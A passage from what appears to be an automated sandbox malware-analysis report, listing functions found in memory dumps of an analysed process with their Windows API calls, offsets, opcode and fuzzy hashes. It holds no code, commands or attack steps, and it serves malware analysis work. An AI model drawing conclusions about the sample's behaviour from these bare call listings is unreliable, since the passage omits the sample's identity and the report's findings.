                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: ccf5d7501b7d588c789794b03a75cd77556a720000447fa9db4306e70c4c6e4c
                                                    • Instruction ID: 7fc185ebe3a46584eee010e34c8bb9094f72f4610e70f91c51610c8321080bc1
                                                    • Opcode Fuzzy Hash: ccf5d7501b7d588c789794b03a75cd77556a720000447fa9db4306e70c4c6e4c
                                                    • Instruction Fuzzy Hash: 8511C472500300EFEB21DF55DC45BABFBA8EF44720F14C46AED098A281D674A904CBB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B08E5
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 07f7eea8b609e3cd7586bbf63d68a0073877186199dc0b2a6d35b0439adef443
                                                    • Instruction ID: 82cdfa28cd03e1127639e792b62a8f84d411ed52eaa5a30e3b5b103d7ab6fe88
                                                    • Opcode Fuzzy Hash: 07f7eea8b609e3cd7586bbf63d68a0073877186199dc0b2a6d35b0439adef443
                                                    • Instruction Fuzzy Hash: 4D11BF72400300EFEB22DF51DD45FA7FBA8EF18720F04895AED499A251C671A504CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0067BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ccf595135efc36295647c0f6d9e8f934631dbf9b1edd978c5cec2c6bfa70b64f
                                                    • Instruction ID: 69464669e89c959cfe1a0943b6334714c586b62eaa81d6d1ec5c238bc97e9336
                                                    • Opcode Fuzzy Hash: ccf595135efc36295647c0f6d9e8f934631dbf9b1edd978c5cec2c6bfa70b64f
                                                    • Instruction Fuzzy Hash: 81116D72504384AFDB22CF65DC45B92FFF4EF15310F08849AE9898B662D375E818DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 029B132F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: ee7f57d31781111dd5cd3c6fafd353ab1109fe10d987759fb348fdadb745fe6a
                                                    • Instruction ID: a31cd40a41f12807df2af315fcc3141881f0c0b3f9c08b5a6424705c182faf29
                                                    • Opcode Fuzzy Hash: ee7f57d31781111dd5cd3c6fafd353ab1109fe10d987759fb348fdadb745fe6a
                                                    • Instruction Fuzzy Hash: F71191715093849FDB128F65DC55B96FFE8EF06220F0984EFED498B252D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0067A39C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 3392952bfd86da9f432ba21fa49a873a18f969f1c9c374eeef7782415ec5b08d
                                                    • Instruction ID: 128bba48fb375ce3d906f0094c27b04b31af00aeb1904ca21aa17e8a86a5b135
                                                    • Opcode Fuzzy Hash: 3392952bfd86da9f432ba21fa49a873a18f969f1c9c374eeef7782415ec5b08d
                                                    • Instruction Fuzzy Hash: 98116D714093C09FE7128B25DC54AA2BFB4DF47624F0880CAEDC48B253D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 029B0640
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 30548f49082577ab5b60324494e3ed843881172426a6999430ea4efea378ecfe
                                                    • Instruction ID: e89ff09dd7eac7eb990866d65d33825fdd9210cb6cd45154a0835c0723f7ed95
                                                    • Opcode Fuzzy Hash: 30548f49082577ab5b60324494e3ed843881172426a6999430ea4efea378ecfe
                                                    • Instruction Fuzzy Hash: 4311C6755093C09FD7128B25DC55B52FFB4DF57220F0880DBED858B653D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 029B099C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: b268777ed8bbbb0e1fa4e6cb2e784718961132dde0de64d9717cbf3001c0a431
                                                    • Instruction ID: 644099d3c3d35525a43fdeaa53540bba9f3df7249960014a06f7ac01b34233f6
                                                    • Opcode Fuzzy Hash: b268777ed8bbbb0e1fa4e6cb2e784718961132dde0de64d9717cbf3001c0a431
                                                    • Instruction Fuzzy Hash: F7119D714093C09FE7238B25DC55B92FFA4EF07324F0980DADD844B263C265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0067AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: f7ce71c93fea5212a0634ee0976d918b1dc81fd0f14a3d3eea723d65727beffe
                                                    • Instruction ID: 798279687b42d4a7452b29895b426ad8d5be9145461d73cf070db8f6378044d8
                                                    • Opcode Fuzzy Hash: f7ce71c93fea5212a0634ee0976d918b1dc81fd0f14a3d3eea723d65727beffe
                                                    • Instruction Fuzzy Hash: 9B113CB26002009FEB20DF65DC85B9AFBD9EB55721F08C46AED49CB742D674E844CA72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0067AA71
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 7855ccb6a632155f9ec958dbefd3c16755aa8b570e0c5d03c61d21536cf7a0e2
                                                    • Instruction ID: 7a00009fdb43628510f2e46650e3835ee48f53f0ff0c8278e3ca9f733eeec603
                                                    • Opcode Fuzzy Hash: 7855ccb6a632155f9ec958dbefd3c16755aa8b570e0c5d03c61d21536cf7a0e2
                                                    • Instruction Fuzzy Hash: EB11C1754097C09FD7128B21DC85A91BFA0EF13320F0980DBDD848F2A3D269A909CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B0819
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 384759e5084388197eff0efcf4dfddd0bf8af1a8d67e7d135d1ee2a4c5daecd4
                                                    • Instruction ID: a1f2a316e0d09ac4066f935be7aa53bd8772752fa365518e1f544662a9a2150e
                                                    • Opcode Fuzzy Hash: 384759e5084388197eff0efcf4dfddd0bf8af1a8d67e7d135d1ee2a4c5daecd4
                                                    • Instruction Fuzzy Hash: F301C071500304EFFB219F11DD85BA7FB98DF04720F14849AED089A282D675AA04CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 6101acf866670847348a37cb4c7b1c6673fa1cbc4f06400c594c6f0f0f5bc7da
                                                    • Instruction ID: cacffbf3e69266fedabf27dae78ca5b23c210a44a3f5239421085ff821da63e8
                                                    • Opcode Fuzzy Hash: 6101acf866670847348a37cb4c7b1c6673fa1cbc4f06400c594c6f0f0f5bc7da
                                                    • Instruction Fuzzy Hash: 5B118B76500700DFEB21DF56DD85BA6FBA8EF04620F0884AAED498B652D371E408CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0067ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 655f7448d105a47f41c4fe9f9903766bb63d24cde67c93416d480340373badbb
                                                    • Instruction ID: 25dac939df29c9791b0c064ed3b403f66edfb16c3a1c4f417d3aa7a5c784181c
                                                    • Opcode Fuzzy Hash: 655f7448d105a47f41c4fe9f9903766bb63d24cde67c93416d480340373badbb
                                                    • Instruction Fuzzy Hash: 931170B55093809FDB11CF65DC85B92BFA4EB52324F0980ABDD488F253D275A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0067BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c0776635377ca246df2404cb447b143994152effad2fdf8344d4c46ff6e17723
                                                    • Instruction ID: 6e55d221764b595e9fe2255a91dd0b104d3ad35c14e5e73f627589ef2be1197c
                                                    • Opcode Fuzzy Hash: c0776635377ca246df2404cb447b143994152effad2fdf8344d4c46ff6e17723
                                                    • Instruction Fuzzy Hash: 1A118B72500704DFEB21DF95DC84BA2FBE5EF18320F08C4AAED898A612D371E414DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 029B01D0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 7472720c5d169f61ddc1fadd3f285dfca06d5927b4c41037fed9e047b2b1787b
                                                    • Instruction ID: 4599f7aa72daef1f5bec5e30613a13e29f3f32ad088667977e58c795dd811c0e
                                                    • Opcode Fuzzy Hash: 7472720c5d169f61ddc1fadd3f285dfca06d5927b4c41037fed9e047b2b1787b
                                                    • Instruction Fuzzy Hash: B8015E71A00744DFEB11DF65DD857A6FB98DF01621F0884AADC09CB642D674E404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 029B109E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: e166b9e60da9c79daa7b3f89fdcd213bb3e6d2a4a21c50076b6748d91bf56c10
                                                    • Instruction ID: eaa0047e17ad7bd23bf1c94adc39ab9c5c42bf5b0e522a638988c9f459965b36
                                                    • Opcode Fuzzy Hash: e166b9e60da9c79daa7b3f89fdcd213bb3e6d2a4a21c50076b6748d91bf56c10
                                                    • Instruction Fuzzy Hash: EA017171900600ABE310DF26DD46B66FBA8FB84B20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0067A23E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 6470b2d33143d5d8d4ed912f68521a4815f66723688bba9580f75c885a172150
                                                    • Instruction ID: ffd9a4e3d14a3dda8298f9cae6c8e8bc1d99996f470cb52869ea8b4b6de53d7a
                                                    • Opcode Fuzzy Hash: 6470b2d33143d5d8d4ed912f68521a4815f66723688bba9580f75c885a172150
                                                    • Instruction Fuzzy Hash: 6F018471900600AFE310DF26DD46B66FBE8FB84B20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 029B132F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 6fce95b440f6689b07cd5f75e39a1d0525df3c9c2afa54ef0ae07a741d57ef4a
                                                    • Instruction ID: 424e1d7d5e85e87bf8197302899cf3aa7bc9a6ca9a1a65b8601a38ff2df7b471
                                                    • Opcode Fuzzy Hash: 6fce95b440f6689b07cd5f75e39a1d0525df3c9c2afa54ef0ae07a741d57ef4a
                                                    • Instruction Fuzzy Hash: C201DF71504300DFEF11DF55DD857A6FBE8EF05620F08C4AADC098B642E275E404CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0067BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: bfb74dee7db1aa7b6b573b31b9cd227d71a34fb6eed61254a46cfa97630959dd
                                                    • Instruction ID: 7f5053fea378efe300162bb6fbfea335562971e3e596b49c93f90d343e1139ca
                                                    • Opcode Fuzzy Hash: bfb74dee7db1aa7b6b573b31b9cd227d71a34fb6eed61254a46cfa97630959dd
                                                    • Instruction Fuzzy Hash: 9B01DF71500200DFEB20CF65DC857A6FBA4EF05B20F08C4ABDD098B256D775E804CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 029B0502
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 772c1d76ac1a4498c4da9eeaee8b508642b497953319d92a3c1c18d6b149c948
                                                    • Instruction ID: 81b22f4221458ffa6092e94a2eed2c7e26e4d05eef3e0980d3f3974905400079
                                                    • Opcode Fuzzy Hash: 772c1d76ac1a4498c4da9eeaee8b508642b497953319d92a3c1c18d6b149c948
                                                    • Instruction Fuzzy Hash: 89016271900600ABD310DF16DD46B26FBA4FB89B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 029B0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 8061358af82f6773f917b29ba1032c47c6fd25f45e7d9001314a3de04cf17564
                                                    • Instruction ID: 341ee5c5e5a8f99e46bfb91f72d4ad3eb563b0adfadf9182b91861012270d030
                                                    • Opcode Fuzzy Hash: 8061358af82f6773f917b29ba1032c47c6fd25f45e7d9001314a3de04cf17564
                                                    • Instruction Fuzzy Hash: 6F018F71600344DFEB21DF55D989BA6FBE8EF04661F08C4AADC088F246D374E404CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0067A94A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 6a9ab2665a292c8bdfa1b9131751886072cd281d4d84156cd8ebc5f738c8aa42
                                                    • Instruction ID: 023494406559510efffbfaa9fe839dace94b54d68c1bafb0ba0bdbc0d9f2d1d8
                                                    • Opcode Fuzzy Hash: 6a9ab2665a292c8bdfa1b9131751886072cd281d4d84156cd8ebc5f738c8aa42
                                                    • Instruction Fuzzy Hash: 47018671900600ABD310DF16DD46B26FBF4FB89B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 029B0640
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: f4ea91a96f039e2e82524239bf06efd882ea71e6be213a1cb0014381d3e80d13
                                                    • Instruction ID: eee758c28aa8ea328a137bd63495cd79a659239b5b250c1751245c58cb7e9413
                                                    • Opcode Fuzzy Hash: f4ea91a96f039e2e82524239bf06efd882ea71e6be213a1cb0014381d3e80d13
                                                    • Instruction Fuzzy Hash: 5001FF35600700CFEB218F29D9857A6FBA4EF45721F08C1AADC498B752D274E808CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0067ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 93096f4a5605e9c7c5f759be3244f5a9ce47b6fd3ea58b72a97f2fc0747b865c
                                                    • Instruction ID: 3e52cd862d754c41d503e172f1a45e641d14d83639a79feb792d7a572f8c2e79
                                                    • Opcode Fuzzy Hash: 93096f4a5605e9c7c5f759be3244f5a9ce47b6fd3ea58b72a97f2fc0747b865c
                                                    • Instruction Fuzzy Hash: B001A971404240DFEB10DF95E889BA6FBA4EB50721F18C0AADD088B242D274A804CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 029B1148
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 5df9c3c92e53a582fb157c84c89613889a33ed8ea90a8937ea44f2425c935f00
                                                    • Instruction ID: 074a116b85729064b88b0451ce0e204caf33cd45eb1b036862f844cd17575094
                                                    • Opcode Fuzzy Hash: 5df9c3c92e53a582fb157c84c89613889a33ed8ea90a8937ea44f2425c935f00
                                                    • Instruction Fuzzy Hash: E9F0AF35500740DFEB21DF05D9857A6FBA4EF05A21F08C09ADD494B352D675A544CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029B096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 029B099C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: b7856408a0f3899a15da01745e7b1fac0debbd2b5be5d5e97e761f52688a8f3e
                                                    • Instruction ID: 81bc3df6b9fd44ba8e27b84343432bfae0e844cb91b287562e93bfd468100400
                                                    • Opcode Fuzzy Hash: b7856408a0f3899a15da01745e7b1fac0debbd2b5be5d5e97e761f52688a8f3e
                                                    • Instruction Fuzzy Hash: 3DF02D35800300CFEB21DF06D9887A6FFA0EF18321F08C09ACC480B302C374A408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0067A39C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 091758bd3043e430c3896b86a75eac531768626ef80dbc4c3e6511a7b976dc51
                                                    • Instruction ID: 9f1a156406c585a3fc2ef89d56adcb47fd70abae24f3b91a97c9c7099bb5e9ea
                                                    • Opcode Fuzzy Hash: 091758bd3043e430c3896b86a75eac531768626ef80dbc4c3e6511a7b976dc51
                                                    • Instruction Fuzzy Hash: D6F0F935400700CFEB209F46D888769FBA1EF44331F08C09ADC088B342D374A808CAA3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0067AA71
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 72701de40e2e67790cab78dbe7e886bd4725456a937fecba6e793fd9d4323453
                                                    • Instruction ID: aa083d09ae4cc863daffda3e2b13b31347445b0dd7a57873c8580a16af726bca
                                                    • Opcode Fuzzy Hash: 72701de40e2e67790cab78dbe7e886bd4725456a937fecba6e793fd9d4323453
                                                    • Instruction Fuzzy Hash: 94F0CD31500740CFEB10CF55DA89765FBA0EF45721F18C0AADD0D4B342D279E904CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0067A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 62fd0c7d54a2d310b3e8e4d79c47c2957e838c2afe528a5ab2cbb6f3430516ab
                                                    • Instruction ID: 25b3b19eb23d6d9420fda3d508a0dfee71b8f481e722ddf8729d2ab08039695f
                                                    • Opcode Fuzzy Hash: 62fd0c7d54a2d310b3e8e4d79c47c2957e838c2afe528a5ab2cbb6f3430516ab
                                                    • Instruction Fuzzy Hash: D411A3715093809FD712CF65DC45B96FFA4DF46221F0980EBED498B253D275A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0067A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0067A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 3d9eb47cce3bad769d78a1eb8e926e1310196406eb5586d75cd06c2abdc085ec
                                                    • Instruction ID: 1b40b4b80517243c345a8eb2e6977dcecc394359c33bdfc41c745003aeb56e5c
                                                    • Opcode Fuzzy Hash: 3d9eb47cce3bad769d78a1eb8e926e1310196406eb5586d75cd06c2abdc085ec
                                                    • Instruction Fuzzy Hash: E601DB72610640CFEB10DF65D8897AAFBA4EF44321F18C0ABDD098B242E275A804CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02BE0648, Relevance: .2, Instructions: 203COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2186105623.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 890c524c3c74a68e3a97e96a861d7f74a6b943413c47af0c531b2f75da700e36
                                                    • Instruction ID: dce38ea77688bc469be33ef2d622ca8e27e69a0b429b0902a89c21d3969a3885
                                                    • Opcode Fuzzy Hash: 890c524c3c74a68e3a97e96a861d7f74a6b943413c47af0c531b2f75da700e36
                                                    • Instruction Fuzzy Hash: 52410BA254E3E00FCB1367781C69A853FB48E4322478F44EBD485EB0E3C648984AC3A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02AC07F7, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185768103.0000000002AC0000.00000040.00000040.sdmp, Offset: 02AC0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1d20f7ee6ef7e1355b3c3f5e021fe4610d5fb53a035f65d5b6f56f4b943a16f
